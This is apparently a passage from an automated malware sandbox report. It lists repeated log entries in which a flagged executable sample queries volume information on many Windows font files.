          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
